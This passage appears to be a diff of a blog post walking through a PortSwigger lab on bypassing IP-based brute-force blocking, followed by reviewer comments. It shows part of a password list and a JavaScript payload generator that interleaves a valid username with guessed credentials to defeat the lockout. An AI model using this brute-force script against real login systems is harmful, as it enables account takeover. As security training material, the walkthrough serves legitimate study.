site/content/blog/2025-02-17-portswigger-lab-walkthrough-broken-brute-force-protection-ip-block/index.md

```diff
@@ -0,0 +1,793 @@
+    "thunder",
+    "taylor",
+    "peter",
+    "matrix",
+    "mobilemail",
+    "peter",
+    "mom",
+    "monitor",
+    "peter",
+    "monitoring",
+    "montana",
+    "peter",
+    "moon",
+    "moscow",
+    "peter",
+];
+
+// Match the length of the shorter payload set
+// (either usernames or passwords), if unequal.
+var NUMBER_OF_PAYLOADS =
+    usernames.length <= passwords.length ? usernames.length : passwords.length;
+
+/**
+    * Returns the number of generated payloads, zero to indicate unknown number.
+    * The number is used as a hint for progress calculations.
+    *
+    * @return {number} The number of generated payloads.
+    */
+function getNumberOfPayloads() {
+    return NUMBER_OF_PAYLOADS;
+}
+
+/**
+    * Returns true if there are still payloads to generate, false otherwise.
+    *
+    * Called before each call to next().
+    *
+    * @return {boolean} If there are still payloads to generate.
+    */
+function hasNext() {
+    var hasMore = count < NUMBER_OF_PAYLOADS;
+    if (!hasMore) {
+    log("INFO", "All payloads have been generated.");
+    }
+    return hasMore;
+}
+
+/**
+    * Returns the next generated payload.
+    *
+    * This method is called while hasNext() returns true.
+    *
+    * @return {string} The next generated payload.
+    */
+function next() {
+    try {
+    if (count >= NUMBER_OF_PAYLOADS) {
+        throw new Error("No more payloads available.");
+    }
+    var payload = usernames[count] + MID + passwords[count];
+    log("DEBUG", "Generated payload: " + payload);
+    count++;
+    return payload;
+    } catch (err) {
+    log("ERROR", "Payload generation failed: " + err.message);
+    return "";
+    }
+}
+
+/**
+    * Resets the internal state of the payload generator, as if no calls to
+    * hasNext() or next() have been previously made.
+    *
+    * Normally called once the method hasNext() returns false and while payloads
+    * are still needed.
+    */
+function reset() {
+    log("INFO", "Resetting payload generator.");
+    count = 0;
+}
+
+/**
+    * Releases any resources used for generation of payloads (for example, a file).
+    *
+    * Called once the payload generator is no longer needed.
+    */
+function close() {
+    log("INFO", "Payload generator closed.");
+}
+
+/**
+    * Logs messages at different levels (INFO, DEBUG, ERROR).
+    *
+    * @param {string} level - The log level.
+    * @param {string} message - The message to log.
+    */
+function log(level, message) {
+    print("[PayloadGenerator] [" + level + "] " + message);
+}
+```
+&nbsp;
+
+Assigning the username and password payloads to separate positions results in a cluster bomb attack. So, our script generates payloads for just one position (based on [this Stackoverflow answer](https://stackoverflow.com/a/66613914)). The position, as we’ll see in the next step, includes both the username and password values. This means that the payloads generated look something like `carlos&password=randopass`:
```

Comment:
Now I see why you went script not files, maybe this should be clarified earlier.

Reply:
BTW: Thanks for linking my SO answer 😁